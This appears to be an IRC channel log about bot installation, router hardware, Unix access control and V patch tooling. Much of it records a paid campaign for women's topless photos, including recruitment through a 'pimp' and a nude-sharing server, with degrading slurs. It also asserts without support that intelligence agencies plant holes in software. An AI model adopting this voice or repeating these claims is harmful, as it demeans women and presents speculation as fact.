lobbes: hm, so I was following install steps for trinque's ircbot-genesis (http://btcbase.org/patches/ircbot-genesis#selection-167.10-167.39) and it looks like the "init http://trinque.org/src/ircbot" step downloads the robots.txt which, upon pressing, barfs with "INVALID SEAL" eggog >> http://p.bvulpes.com/pastes/qHlDI/?raw=true 1803324;1524152818;mod6;lobbes: ah! ok, glad to hear the doc was helpful. nothing worse than unhelpful docs. 1803325;1524152856;mod6;(if anyone notices any erratum in that doc, please write in) 1803326;1524152876;trinque;ah, looks like I need to get the src dir pulled over to pizarro 1803327;1524152891;lobbes;ah! okay that was my next comment 1803328;1524152898;*;trinque will do shortly 1803329;1524152909;lobbes;I was having issues with the logbot init step (wasn't pulling the patch into patches) 1803330;1524152915;mod6;cool, gonna have a mirror over there, or just the main repo now? 1803331;1524152917;lobbes;but okay, I'll just hold tight for now 1803332;1524152950;trinque;mod6: main repo 1803333;1524152984;mod6;kewl 1803334;1524153038;trinque;yeah, it's fantastic to know the people touching the hardware. I'm so far very pleased with the service. 1803335;1524153620;mod6;trinque: *thumbsup* 1803336;1524155228;ckang;what rockchip SoC board are yall messin with? 1803337;1524155377;mod6;ckang: <@mod6> http://btcbase.org/log/2018-04-03#1792521 1803338;1524155377;a111;Logged on 2018-04-03 18:27 asciilifeform: ROC-RK3328-CC ( currently building a kernel for it, without the 'evil' periphs ) 1803339;1524155418;ckang;pretty stout 1803340;1524155477;ckang;ive been wanting to build a small single port router or inline router that protects ones entire internet 1803341;1524155499;ckang;with the ability to do policy based routing over various tunnels/vpns/tor what not 1803342;1524155526;ckang;but the typical ARM offerings just dont have the nuts to do openvpn with decent speed 1803343;1524155575;mod6;ah 1803344;1524155577;ckang;then for a minute I was exploring using the ESP32's cryptography accelerator with QSPI and DMA 1803345;1524155605;ckang;since it actually solves stuff fairly quick 1803346;1524155780;spyked;ckang, one alternative you can consider is "pcengines" board. plenty of info in the logs. fanless, runs coreboot bios iirc and has at least 2 gigabit ethernet ports. 1803347;1524155785;spyked;!#s pcengines 1803348;1524155785;a111;78 results for "pcengines", http://btcbase.org/log-search?q=pcengines 1803349;1524155848;*;trinque has an apu2 router over here 1803350;1524156059;ckang;this is actually how i stumbled across wireguard initially 1803351;1524156080;ckang;trying to find something secure but had performance on ARM based equipment 1803352;1524156095;ckang;openvpn is just a piggy 1803353;1524156215;ckang;spyked: i think at that point i would go with an intel atom board with dual or quad port from ali, they arent too bad price wise and you dont get stuck maintaining a fork 1803354;1524156322;ckang;https://www.aliexpress.com/item/Minisys-4-Lan-pfsense-minipc-Intel-atom-E3845-quad-core-mini-itx-motherboard-linux-firewall-computer/32825684280.html 1803355;1524156338;ckang;AES-NI support 1803356;1524156369;trinque;"yes, let me accelerate your crypto in this black box citizen. hold still." 1803357;1524156411;ckang;https://www.aliexpress.com/item/Fanless-Mini-PC-4-Gigabit-Lan-Ethernet-NIC-Core-i3-security-AES-NI-Qotom-Router-Pfsense/32847784876.html <-- ooo, i3 1803358;1524156426;ckang;lol, well its coming from china so its probably 100% legit ;p 1803359;1524156448;ckang;would be extra components and they are very thrifty 1803360;1524156499;trinque;idea that the chinese wouldn't diddle cryptography devices they export is pretty entertaining. 1803361;1524156516;ckang;well its on the intel silicon 1803362;1524156541;trinque;ah, I thought we were talking about the arm thing, but it goes double for intel 1803363;1524156559;*;trinque always thought that name for a chip company was cheeky 1803364;1524156562;trinque;bbl 1803365;1524157455;phf;it's a shame that soekris stopped making their network boards. asciilifeform though thinks they were overpriced, but i suspect it's "not made in china" premium. i have one soekris board with 4 years uptime, and i use another one for the router, which does some of the tricks ckang mentioned. 1803366;1524157551;ckang;phf: my worry is being able to sustain enough throughput mostly, a somewhat higher end consumer model cant manage much over 20Mbit/s 1803367;1524157566;ckang;and availability 1803368;1524157584;ckang;(consumer model router, sorry) 1803369;1524157641;phf;soekris was one of those boutique operations. guy closed the u.s. branch (he's scandinavian), and now he only makes high end DACs instead. 1803370;1524157676;ckang;yea, those places are typically premium price, but as to be expected, small batch runs are expensive 1803371;1524157704;ckang;even being able to buy a small qty of SoC can be hard with most mfg 1803372;1524157784;ckang;am curious what those little atoms/i3 can push though, pretty nice package overall w/ wifi and quad port 1803373;1524157820;phf;ckang: so i had a lot of throughput problems when i started doing this, back when budged option was to flush consumer router firmware with a linux, but when i built this router i was already tmsring, so it's running openbsd and is more sekuriti oriented 1803374;1524157899;phf;i should probably test it at some point in isolation. it would be a pointless exercise though since i don't have a 20MBit/s pipe out anyway. perhaps the value might be "look at what custom board can do compared to this chinese crap", but i somehow doubt that would be the result. 1803375;1524157905;ckang;what have you managed to push encrypted on the board? 1803376;1524157928;ckang;or pull 1803377;1524158086;ckang;i ended up just adding a deb8 vm and my entire router is virtualized now, only lose ~2Mbit off the top (148Mbit) while still only using the tunnel with wireguard 1803378;1524160417;mircea_popescu;http://btcbase.org/log/2018-04-19#1803308 << very fucking easy to do, are you kidding me ? system builds the FS tree, exposes / to all users symbolically but only lists permitted files and then for every node in the directory treee only lists those which are either all or user. 1803379;1524160417;a111;Logged on 2018-04-19 10:24 spyked: http://btcbase.org/log/2018-04-19#1803146 <-- this is (nearly?) impossible to achieve within the Unix access control model. it's easy to express "no one but user1 has access to dir1", but no reasonable way of expressing the reverse, i.e. "user2 can access only dir2". must be one of the reasons why namespaces and cgroups were added to Linux 1803380;1524160538;mircea_popescu;ie if you have / 755 root:root home/ 755 root:root klinki 755 klinki:klinki /sikrit 700 klinki:klinki then user bolek can see all the way to /home/klinki and user klinki all the way to /home/klinki/sikrit. 1803381;1524160570;mircea_popescu;and if you want to get fancy you can even reconstruct dirstructure by restating it while skipping invisible spots, so that a path may be /a/b/c/ for one and /a/c/ for another. 1803382;1524160587;mircea_popescu;what the fuck, there's 0 high level difficulty here, 100% unixtards being unixtards. 1803383;1524161323;BingoBoingo;!Q later tell avgjoe I don't talk to strangers in private 1803384;1524161323;lobbesbot;BingoBoingo: The operation succeeded. 1803385;1524161531;spyked;mircea_popescu, okay, but can you make klinki see *only* /home/klinki/sikrit and nothing else? that's how I understood hanbot's problem. I dun see any practical way of doing it (other than by chroot'ing). 1803386;1524162181;spyked;anyway, I'm sure that this can be enforced by having all the other users except the "limited user" deny rwx access to their dirs. but this doesn't say anything about the "limited user" explicitly, only implicitly. kinda like in that joke with enclosing the sheep using as little fence material as possible. 1803387;1524162321;mircea_popescu;spyked, by making the first dir that's not specifically world-visible or his own whatever she wanted it to make. 1803388;1524162329;spyked;(note that I did not claim this to be "the wrong way" or anything. just that in other access control schemes it can be explicitly expressed, in some cases at cost of implementation complexity etc.) 1803389;1524162351;mircea_popescu;understand, this model whereby user falls into root because "we couldn't open the subdir you should have" is the lulz of all time. 1803390;1524162364;mircea_popescu;"i can't identify you so here's the oval office" 1803391;1524162382;mircea_popescu;"you were fired, the way to the vp lounge is to the left" 1803392;1524162593;mircea_popescu;and it all came from original idiocy, "oh, to have bash AT ALL you must have access to /sbin/bash or else a copy of it somewhere". bullcrap. look at what apache does -- somehow it DOES manage to run all users' php crapolade from whatever directories. bash can (and obviously should fucking have) worked the exact same way. of course you can run bash from your homedir even if that is /home/users/f/u/c//k/t/h/i/s/l/u/s/e/r/john. 1803393;1524162594;mircea_popescu;and even if you think /home/users/f/u/c//k/t/h/i/s/l/u/s/e/r/john is actuyally / 1803394;1524162658;mircea_popescu;(which is what is the only fucking POSSIBLE meaning of "set home directory" : as far as ALL POSSIBLE terminals that user springs up, the indicated point in the filestructure is his root. and he sees its downstream and nothing else fucking ever.) 1803395;1524162683;trinque;now there's a point. user's shell should just have whatever commands he can use loaded into it 1803396;1524162689;trinque;and not rely on a $PATH 1803397;1524162760;mircea_popescu;duh. 1803398;1524162764;mircea_popescu;fucking path, the hack of all time. 1803399;1524162799;mircea_popescu;you know what is the HARDEST, most screaming, wailing and tear ladden item every time i explain unix, the posix model, linux basics etc to fundamentally minded slavegirls that are well accomplished in other fields and can think ? 1803400;1524162815;mircea_popescu;the fucking path. and for the very good reason that it's nonsense enough to make gates proud. 1803401;1524163228;mircea_popescu;meanwhile the russkis made online-homm3. http://www.lordswm.com/ 1803402;1524163233;mircea_popescu;"lords of war and money" lol. 1803403;1524164285;hanbot;http://btcbase.org/log/2018-04-19#1803390 << exactly, that blew my mind. no idea why limiting someone to their homedir should be complicated either. isn't keeping users cloistered like...the fucking reason a "users" system even exists? what else is it for, personalized wallpaper? 1803404;1524164285;a111;Logged on 2018-04-19 18:26 mircea_popescu: "i can't identify you so here's the oval office" 1803405;1524164898;spyked;^ my point in the first place. POSIX ACL was designed from the idea that "all users are equal, except /a/b can be accessed only by X and /c/d only by Y etc.". while saying that "Z can only access /e/f" can only be implemented as "/a/b and /c/d and etc. can't be accessed by Z". and sure, there's chroot, that sets /e/f to /, but in practice this introduces other issues 1803406;1524165004;spyked;I can't help but http://archive.is/TRrOE again 1803407;1524165263;mircea_popescu;heh. 1803408;1524165266;mircea_popescu;assholes. 1803409;1524165517;mircea_popescu;mp's morning adventure : the curse of the shapely bottles. 1803410;1524165545;mircea_popescu;bereft of female support, i woke this morning among empty vast halls, ruin already gnawing silently in their corners. 1803411;1524165580;mircea_popescu;to eat, to eat, but what to eat! there's no fire going happily in the hearth, there's no water splashing on nude thighs unintentionally and aggravatingly, the kitchen's dead and i must have leftovers! 1803412;1524165610;phf;a bironian tragedy 1803413;1524165648;mircea_popescu;so i pick the yesterday's chicken pilaf, and dump on it three spooning heapfuls of the mango-raisin-ginger jam in the half gallon jar. then a spoonlet of chilera. and then... a small and kinda tired&old but very ripe aguacate. 1803414;1524165690;mircea_popescu;i must now retire and meditate in sadness over the miserable fate fate had in store for me this morn. 1803415;1524165810;douchebag;!!up Starrrcx 1803416;1524165811;deedbot;Starrrcx voiced for 30 minutes. 1803417;1524165822;Starrrcx;I have titties 1803418;1524165906;Starrrcx;!!register http://p.bvulpes.com/pastes/elJkg/?raw=true 1803419;1524165909;deedbot;20063837E6C0CB9F6FAFA48CCF3286C05B1D2494 registered as Starrrcx. 1803420;1524166499;douchebag;Starrrcx: you'll have to wait for mircea_popescu 1803421;1524170148;jurov;mod6: ack 1803422;1524170438;mod6;Thanks jurov 1803423;1524171470;deedbot;http://qntra.net/2018/04/deutsche-bank-fat-fingers-35-billion-usd-payment/ << Qntra - Deutsche Bank Fat Fingers 35 Billion USD Payment 1803424;1524171533;trinque;need moar practice with titties eh? 1803425;1524171560;BingoBoingo;Defo 1803426;1524171998;douchebag;Fuzz via Titties all day long 1803427;1524179349;BingoBoingo;In other weird https://apartamento.mercadolibre.com.uy/MLU-452797695-apartamento-en-pocitos-nuevoloft-con-terraza-contra-frente-_JM 1803428;1524181221;phf;http://btcbase.org/log/2018-04-19#1803375 << i have ipsec subnets to essentially identical openbsd installs, but egress is to wan. i use pf to route specific things through the ipsec subnets. i've never benchmarked it though. it's good enough to watch an occasional regioned youtube, or pull a torrent at 5mbit saturation 1803429;1524181221;a111;Logged on 2018-04-19 17:11 ckang: what have you managed to push encrypted on the board? 1803430;1524189987;ckang;phf: ah if you have a spare board you can run on a local net, i would be curious how it stacks up 1803431;1524190091;mircea_popescu;Starrrcx, 8d539ed5. 1803432;1524190094;ckang;its become an obsession of mine almost 1803433;1524190142;*;mircea_popescu waves 1803434;1524190164;ckang;even more so after the recent changes in gov policy in regards to information harvesting by ISPs 1803435;1524190214;ckang;hi mircea_popescu 1803436;1524190383;mircea_popescu;heya. 1803437;1524190460;ckang;if you get a min, had an issue with the bots on 1 girl, pheeby 1803438;1524190479;ckang;i think it may have been when the code registration issue was happening 1803439;1524190812;douchebag;yo mircea_popescu 1803440;1524190881;douchebag;im gonna let Starrrcx you're on 1803441;1524191072;mircea_popescu;aite. 1803442;1524191103;mircea_popescu;ckang, she's not been paid ? 1803443;1524191171;ckang;mircea_popescu: yea, i found the !!pay but !!ledger shows nothing 1803444;1524191190;mircea_popescu;aite, ima re-add her in next batch. 1803445;1524191263;ckang;re: chroot/$PATH stuff, is there any reason not to opt for a container model and leave that abstraction up to a dedicated system? 1803446;1524191300;ckang;performance hit is fairly negligible 1803447;1524191394;mircea_popescu;depends how you count the hit. complexity hit is significant. 1803448;1524191415;mircea_popescu;metaphorically speaking, the solution to spilling some food in front of the fridge is not to attach a mechanical broom to it. 1803449;1524191428;ckang;my experience with chrooted/jailed setups has been, overall, messy 1803450;1524191464;mircea_popescu;yeah. the whole stygian stable has to be cleanned out. no more PATH and no more bash-style calls. apache style calls. 1803451;1524191481;ckang;PATH turns into a a cluster fuck, always 1803452;1524191608;ckang;openvz i didnt care much for, docker has been solid though 1803453;1524191667;ckang;and being able to control the network gives way more flexibility in limiting what someone can/cant do 1803454;1524191707;mircea_popescu;you ever read docker ? 1803455;1524191743;ckang;the source? or what aspect 1803456;1524191818;mircea_popescu;yes the source. 1803457;1524191839;ckang;no, i have not, pretty iffy? 1803458;1524191852;mircea_popescu;so in what sense "has it been solid" then ? 1803459;1524191863;ckang;oh, in terms of stability and usability 1803460;1524191950;mircea_popescu;understand how the empire of idiots' euphemism threadmill works : they noticed that you go by the heuristic of "published holes", and they've adapted to that (because that's what the idiots are all about, "Exam taking", ie optimizing for the measurement not for the variable measured). so, they keep publishing strainers and calanders, except the sort where YOU don't know the holes. it gives you the warm fuzzy feeling that "The 1803461;1524191950;mircea_popescu;y're reasonablyt safe, as far as we know" ; and as we learn better... they just come up with a new piece of shit. 1803462;1524191991;mircea_popescu;this is precisely the "crypto progress" of http://btcbase.org/log/2018-04-16#1800039 ; and everything else. 1803463;1524191991;a111;Logged on 2018-04-16 16:05 zx2c4: mircea_popescu: i take it now that mostly you're skeptical because the nsa was pushing ecc in the early years, before everyone else woke up to it 1803464;1524192026;mircea_popescu;usg trying to leverage the fact that idiots stick together whereas intelligent people jwz, into this situation where they keep shitting turds larger than what you can fit in head and so "one man's guess is as good as any other's" and "we don't actually know it's a scam" hurr durr. 1803465;1524192060;ckang;purposely or by buying 0days ? 1803466;1524192092;mircea_popescu;huh ? 1803467;1524192099;mircea_popescu;they WRITE the holes lmao.\ 1803468;1524192107;ckang;ahhhh 1803469;1524192138;ckang;im surprised we haven't heard more about that, someone with a email or offer publishing it 1803470;1524192162;ckang;i could totally see them buying up new 0days and letting them go unpatched for future use 1803471;1524192215;mircea_popescu;the sad story of tor is a good primer in this sense. 1803472;1524192303;ckang;ahh yea, it was just recently they had the torbrowser svg stuff too 1803473;1524192310;mircea_popescu;http://trilema.com/2013/dear-guardian-stop-being-retarded/ << this is the historical moment when the usg's "technology" machine got killed. 1803474;1524192344;mircea_popescu;now, of course they've been pretending like "it never happened" for five years now ; but then again they're also pretending to be solvent, and militarily relevant, and whatnot. 1803475;1524192475;ckang;i imagine to infiltrate a project successfully they need to 'invest' into it before it becomes too large so theres not 1000s of nerds reviewing commits 1803476;1524192643;mircea_popescu;yup. 1803477;1524192647;ckang;has there been any documented cases of such happening recently? or attempts 1803478;1524192841;mircea_popescu;and also they need a certain sort of fucktard mindset. like this : http://trilema.com/2018/and-in-todays-lulz-the-obnoxious-cocksucker/ 1803479;1524192853;mircea_popescu;ckang, what's your standard for "documented" ? 1803480;1524192890;mircea_popescu;contrary to what you might think, it's 9x% the function of nsa, trolling on github all day. 1803481;1524192891;ckang;just someone publicly calling someone out at trying to inject malicious code into a project 1803482;1524192943;mircea_popescu;think about it -- the sort of people who'd publish idiotic crap a la tor docker etc LIKE the meat injection. and the sort of people who'd protest don't get involved with that. 1803483;1524192976;ckang;https://usercontent.irccloud-cdn.com/file/I5HQ0yxC/templedongOSxxx.png :) 1803484;1524192986;ckang;one of my favs 1803485;1524193006;mircea_popescu;hey. 1803486;1524193009;mircea_popescu;he is right, though. 1803487;1524193026;douchebag;!!up Starrrcx 1803488;1524193027;deedbot;Starrrcx voiced for 30 minutes. 1803489;1524193038;Starrrcx;https://i.imgur.com/YeUNHDM.jpg 1803490;1524193096;douchebag;lmfao 1803491;1524193112;mircea_popescu;!!pay Starrrcx 1803492;1524193117;deedbot;Get your OTP: http://p.bvulpes.com/pastes/KWeTR/?raw=true 1803493;1524193120;mircea_popescu;Starrrcx, so what do you think of bitcoin ? 1803494;1524193166;Starrrcx;internet money 1803495;1524193247;mircea_popescu;well sure. but i mean... how's it sound to you ? 1803496;1524193326;Starrrcx;i dont have much of an opinion besides it being money can you tell me more about it? 1803497;1524193407;mircea_popescu;notrly much more than what's already at http://trilema.com/category/bitcoin/ 1803498;1524193570;Starrrcx;i hear the price on it went crazy high since it was started 1803499;1524193582;mircea_popescu;it did. 1803500;1524193595;Starrrcx;how high will it go 1803501;1524193697;douchebag;mircea_popescu: was her photo valid? 1803502;1524193755;mircea_popescu;whose ? 1803503;1524193760;douchebag;Starrrcx: 1803504;1524193768;douchebag;you only did !!pay Starrrcx 1803505;1524193816;mircea_popescu;oh oh 1803506;1524193820;mircea_popescu;!!pay Starrrcx 0.02 1803507;1524193821;mircea_popescu;ty 1803508;1524193824;deedbot;Get your OTP: http://p.bvulpes.com/pastes/CKb59/?raw=true 1803509;1524193847;douchebag;mircea_popescu: Safe to say this is the oldest participant in the "i will pay for your tits" campaign 1803510;1524193851;douchebag;eh? 1803511;1524193867;mircea_popescu;possibly, yeah. how old are you Starrrcx ? 1803512;1524193891;Starrrcx;im 72 years young 1803513;1524194002;ben_vulpes;mircea_popescu: elaborate on "apache calls"? 1803514;1524194026;mircea_popescu;ben_vulpes, http://btcbase.org/log/2018-04-19#1803392 1803515;1524194026;a111;Logged on 2018-04-19 18:29 mircea_popescu: and it all came from original idiocy, "oh, to have bash AT ALL you must have access to /sbin/bash or else a copy of it somewhere". bullcrap. look at what apache does -- somehow it DOES manage to run all users' php crapolade from whatever directories. bash can (and obviously should fucking have) worked the exact same way. of course you can run bash from your homedir even if that is /home/users/f/u/c//k/t/h/i/s/l/u/s/e/r/john. 1803516;1524194042;mircea_popescu;Starrrcx, yeah, i think you're the years young-est person in there. 1803517;1524194542;douchebag;lol 1803518;1524195419;esthlos;hanbot: said I'd get back to you: getting mp-wp running was relatively painless, most of my issues were with LAMP. I wrote down most of what I did here: http://blog.esthlos.com/mp-wp-setup/ 1803519;1524196499;ckang;!!up haleyyyyy 1803520;1524196499;deedbot;haleyyyyy voiced for 30 minutes. 1803521;1524196546;haleyyyyy;Hi, here for picture 😀 1803522;1524196652;ckang;wait for mircea_popescu 1803523;1524196667;trinque;btw ckang and douchebag, withdrawals are being processed midday now 1803524;1524196711;mircea_popescu;didn't i see that name before ? 1803525;1524196728;mircea_popescu;haleyyyyy, 0f9a63b5 ; but mind that you only get it once. 1803526;1524196734;ckang;she dipped out before she could before but got back with me 1803527;1524196760;mircea_popescu;ah 1803528;1524196764;douchebag;sounds good trinque 1803529;1524196781;douchebag;What time roughly central time? 1803530;1524196785;douchebag;USA 1803531;1524196806;trinque;I'm not committing to a time 1803532;1524196817;trinque;midday in texas 1803533;1524196866;douchebag;Alright sounds good man, thanks! 1803534;1524196882;trinque;phf: trying to press your vtools using mod6's V 99993 1803535;1524196999;trinque;http://p.bvulpes.com/pastes/LlO7Z/?raw=true << doesn't seem like it's flowing the whole way down one branch, unless I've got tired eyes over here 1803536;1524197014;trinque;only thing I do to modify V is make the seals dir not dotted. 1803537;1524197107;trinque;http://btcbase.org/log/2018-04-09#1794417 << ah, thread. 1803538;1524197107;a111;Logged on 2018-04-09 04:25 hanbot: phf et al: attempted to press latest vtools to the keccak head. v (mod6's) reports vtools_vpatch_newline not in flow, neither its antecedent vtools_fixes_static_tohex, despite both patches and (verified good) sigs present (they neither show up via flow command). v will press to vtools_vpatch.vpatch, but no further. see http://p.bvulpes.com/pastes/oNRhE/?raw=true . 1803539;1524197108;phf;trinque: it wouldn't, i believe there's an antecedent->dependency transformation issues (i.e. the transform in mod6 v is adhoc, so it can't handle the tricky antecedent graph). the approach hanbot used was to just use the patches from the left branch of the graph, until, per mircea_popescu's request, i write a general purpose v graph code. 1803540;1524197186;trinque;understood, thank you 1803541;1524197237;phf;http://btcbase.org/log/2018-04-09#1794613 1803542;1524197237;a111;Logged on 2018-04-09 14:31 mircea_popescu: a right. hanbot do me a favour : download ~only~ those patches which are in the leftmost trunk seen on phf's viewer (so exclude vtools_vdiff_sha, and its dependents) and try to flow again ? 1803543;1524197297;ckang;!!up trigglygirl 1803544;1524197297;deedbot;trigglygirl voiced for 30 minutes. 1803545;1524197343;trigglygirl;😃 here for picture 1803546;1524197356;mircea_popescu;trigglygirl, b899a0b9. 1803547;1524197782;trinque;phf: cool, pressed and built 1803548;1524197869;trigglygirl;https://usercontent.irccloud-cdn.com/file/vtLHUCOk/image.jpg 1803549;1524197872;trigglygirl;:) 1803550;1524197990;trinque;heh, got an alpha in there 1803551;1524198037;trigglygirl;Math habit 1803552;1524198127;douchebag;!!up MichelleCx 1803553;1524198128;deedbot;MichelleCx voiced for 30 minutes. 1803554;1524198136;MichelleCx;I'm here for picture 1803555;1524198164;douchebag;!!up MichelleCx 1803556;1524198164;deedbot;MichelleCx voiced for 30 minutes. 1803557;1524198176;haleyyyyy;https://usercontent.irccloud-cdn.com/file/oC3BJ5lm/image.jpg 1803558;1524198571;mircea_popescu;!!pay haleyyyyy 0.02 1803559;1524198575;mircea_popescu;!!pay trigglygirl 0.02 1803560;1524198577;deedbot;Get your OTP: http://p.bvulpes.com/pastes/ZWJks/?raw=true 1803561;1524198580;deedbot;Get your OTP: http://p.bvulpes.com/pastes/reaEQ/?raw=true 1803562;1524198590;mircea_popescu;and with this, ladies and gents, the FOUR YEAR tits for bits hole closes. 1803563;1524198619;mircea_popescu;tell the story to your daughters and granddaughters, so they may know that playing-it-safe and waiting-to-see is not the way to live in this world. 1803564;1524198624;MichelleCx;:c 1803565;1524198657;ckang;heh dang lemme tell these 2 cant do then 1803566;1524198665;mircea_popescu;which two 1803567;1524198676;ckang;i was talking to another who wanted to do it 1803568;1524198676;MichelleCx;can I do it? 1803569;1524198684;mircea_popescu;MichelleCx, nope. too late. 1803570;1524198700;MichelleCx;aww :c 1803571;1524198705;mircea_popescu;ikr. 1803572;1524198714;MichelleCx;can I do anything else? 1803573;1524198725;mircea_popescu;well, you could read the log. 1803574;1524198766;mircea_popescu;aite, everyone's paid, too. enjoy your bits, titties! 1803575;1524198813;ckang;good times 1803576;1524198818;douchebag;mhm 1803577;1524198854;*;mircea_popescu can hear trinque sighing in relief from here. 1803578;1524198863;ckang;haha i bet 1803579;1524198937;douchebag;mircea_popescu: Do I get a bonus for bringing in hella tits :D 1803580;1524198947;trinque;hey, I learned to be less racist against crackwhores. who knew. 1803581;1524198955;mircea_popescu;douchebag, did you ever get that rockchip btw ? 1803582;1524198970;mircea_popescu;trinque, crackwhores are whores too! 1803583;1524198972;douchebag;nah 1803584;1524198999;mircea_popescu;ugh. 1803585;1524199011;mircea_popescu;ben_vulpes, i thought it was "ready to go" and everything days ago ? 1803586;1524199098;douchebag;:/ 1803587;1524199329;ckang;if you ever do anything similar im down but gonna stick around and see where this goes ;p 1803588;1524199385;douchebag;lol ckang think of how many tits the two of us brought in lol 1803589;1524199529;ckang;ive not counted 1803590;1524199687;douchebag;just showing on the "ill pay for your tits site thing" 1803591;1524199692;douchebag;23 1803592;1524199696;ckang;mircea_popescu: how many btw did you end up with? 1803593;1524199696;douchebag;for me lol 1803594;1524199733;douchebag;i know there's more not listed there though 1803595;1524199859;mircea_popescu;how many whats ? 1803596;1524199885;mircea_popescu;oh. i dunno, 60 something, 70 1803597;1524199889;douchebag;there's 23 girls listed on "ill pay for your tits" that I pulled in 1803598;1524199920;mircea_popescu;douchebag, im lazy, there's a whole chunk here that i've not yet ul'd 1803599;1524199937;douchebag;yeah I know I was just coutning lol 1803600;1524200045;douchebag;mircea_popescu: so me and ckang don't get any reward for the effort though ? 1803601;1524200073;mircea_popescu;not more than you already got, no. 1803602;1524200100;douchebag;:/ 1803603;1524200105;mircea_popescu;sucks huh. 1803604;1524200128;douchebag;no early retirement from titties now I guess 1803605;1524200170;mircea_popescu;how much did you actually keep off it ? 1803606;1524200183;douchebag;$1200 1803607;1524200210;mircea_popescu;well, $1200 worth of 2013 btc would sure be a retirement todaty 1803608;1524200230;ckang;lol yea it would be 1803609;1524200243;*;mircea_popescu recalls the lulzy days of "market price" back when i was buying them at 2.20 - 2.50 dollars a pop 1803610;1524200255;mircea_popescu;becauuse totally, "bitcoin price in fiat". that's a thing. 1803611;1524200306;douchebag;I paid $500 in advertisements today though :/ 1803612;1524200336;mircea_popescu;how's that work ? 1803613;1524200386;douchebag;$200 for the pimp lady to get a 3 girls 1803614;1524200395;douchebag;$300 for a discord server that shares nudes 1803615;1524200401;mircea_popescu;o.O 1803616;1524200403;douchebag;for 3 days 1803617;1524200413;mircea_popescu;why's a discord server cost ?! 1803618;1524200426;douchebag;it has like 5k people in it 1803619;1524200441;mircea_popescu;so what do you get for $300 ? 1803620;1524200457;douchebag;a channel in their discord server 1803621;1524200468;douchebag;called tit charity 1803622;1524200490;mircea_popescu;so it's $100 per day per channel ?! 1803623;1524200505;ckang;yea people treat discords like businesses these days, they even sell large servers 1803624;1524200510;ckang;pretty wild 1803625;1524200514;mircea_popescu;now we understand why the discord meme. i imagine it's pretty good money selling "5k imaginary users" to you ppl. 1803626;1524200537;douchebag;well 1803627;1524200543;douchebag;I have 2 girls right now ready to go 1803628;1524200544;mircea_popescu;ckang, consider http://trilema.com/2014/askfm-laid-bare-or-whats-half-a-million-uniques-to-you/ 1803629;1524200554;douchebag;but obv that's nto happening anymore :/ 1803630;1524200574;mircea_popescu;douchebag, you're not proposing anyone else anywhere else can extract anything like that sort of utility out of the shitpile are you ? 1803631;1524200607;douchebag;elaborate? 1803632;1524200748;mircea_popescu;the "5k user discord server" is not substantially different from a piece of paper on which you wrote the number 5 followed by the letter k, or for that matter paul graham's yahoo scam ( http://trilema.com/2015/investigations-in-the-bone-heap-of-the-lost-generation-today-mashable/#footnote_6_59020 / http://trilema.com/2014/the-psychology-of-the-bagholder/#selection-117.0-117.539 ). 1803633;1524200758;mircea_popescu;the right end of that business is to be SELLING the servers to people like you. 1803634;1524200832;mircea_popescu;it's funny how usg history repeats itself : the elite uses the mass to rape the middle class. guy with a little dough and a little brain gets eaten into this "pay the brahmin to use the cattle herd" scheme again and again and again. 1803635;1524200933;douchebag;well, I mean if you didn't end it right now I would have made it all back lol 1803636;1524201043;mircea_popescu;yes. but this source you have found is not simply one or two or three sigmas away from average. it is an uncountable, perhaps a literal infinity of sigmas away from average. 1803637;1524201054;mircea_popescu;it's a rapture-level event, so to speak. 1803638;1524201183;mircea_popescu;you understand that the difference between the ill-pay-for-your-tits value-evaluation-function over this field of items and the anything-else value-evaluation-function over the same field isn't 10x or 100x, either. people routinely have trouble extracting as much as a cent per thousand ; that'd be 10e6x 1803639;1524201225;ckang;im just grateful for the opportunity, any income is income when between work 1803640;1524201256;mircea_popescu;ckang, well, i kinda like to leverage spot experience into more general theory. let's say it's a weakness of mine. 1803641;1524201312;ckang;spot experience as in brief? 1803642;1524201340;mircea_popescu;as in the above thing. a spot of experience. 1803643;1524201378;mircea_popescu;you know, he attempted to run a little business, i'm attempting to help him make sense of it. 1803644;1524201394;mircea_popescu;in my twisted mind, that's a fair trade. 1803645;1524201618;ben_vulpes;mircea_popescu douchebag http://p.bvulpes.com/pastes/Fgc0N/?raw=true holy crap so sorry about that, lost track of needing to actually send creds in the shuffle yesterday 1803646;1524203227;douchebag;thanks <3 1803647;1524203829;hanbot;esthlos: mazel tov, thanks for testing 1803648;1524205051;ben_vulpes;mircea_popescu: end of an era, eh? 1803649;1524205066;ben_vulpes;what a run 1803650;1524205083;mircea_popescu;was kinda getting tedious. 1803651;1524205094;mircea_popescu;but yes, end of an era. 1803652;1524205160;ben_vulpes;mass production ruins everything, artisinal tits ftw 1803653;1524205188;ben_vulpes;night y'all 1803654;1524237312;*;asciilifeform waves 1803655;1524237369;ckang;greetings 1803656;1524237430;*;asciilifeform slowly eats log.. 1803657;1524237516;ckang;yea not too much, been quiet 1803658;1524237590;mod6;hey hey hey, lbj! 1803659;1524239563;BingoBoingo;!!rate asciilifeform 10 Met in person, Verified lover of cats, engineer 1803660;1524239566;deedbot;Get your OTP: http://p.bvulpes.com/pastes/6W62J/?raw=true 1803661;1524239596;BingoBoingo;!!v BE5548591C27289CC50746A5BF15E17AE52FEF136909DC744DCF68F32EF378FA 1803662;1524239596;deedbot;BingoBoingo updated rating of asciilifeform from 10 to 10 << Met in person, Verified lover of cats, engineer 1803663;1524240022;deedbot;http://qntra.net/2018/04/assad-returns-legion-of-honor-award-to-slave-france/ << Qntra - Assad Returns "Legion of Honor" Award To "Slave" France 1803664;1524240933;deedbot;http://qntra.net/2018/04/us-sorghum-boats-looking-for-new-markets-after-china-implements-anti-dumping-measures/ << Qntra - US Sorghum Boats Looking For New Markets After China Implements Anti-Dumping Measures 1803665;1524241302;mircea_popescu;!!up pinochle 1803666;1524241303;deedbot;pinochle voiced for 30 minutes. 1803667;1524241307;mircea_popescu;aand who might you be ? 1803668;1524241897;pinochle;no one, yet 1803669;1524241983;pinochle;just a reader of the logs to this point 1803670;1524241988;mircea_popescu;aite. 1803671;1524242055;pinochle;I have particular interest in http://trilema.com/2018/trilema-poker-bot-spec/ 1803672;1524242066;pinochle;working on implementation 1803673;1524242223;BingoBoingo; no one, yet << What about your pre-history? Who is your daddy and what does he do? 1803674;1524242225;ckang;i just noticed, theres no way to go back to the epoch of the logs 1803675;1524242246;ckang;short of manually iterating through the dates 1803676;1524242318;ben_vulpes;pinochle: reg a key and build a name now, lest you build the thing and nobody uses it because who is this person 1803677;1524242386;pinochle;BingoBoingo: dad was a salesman, his dad drove trucks 1803678;1524242430;pinochle;ben_vulpes: yes, registered a key in wot 1803679;1524242522;pinochle;also agreed on second part, existing in wot and possessing requisite 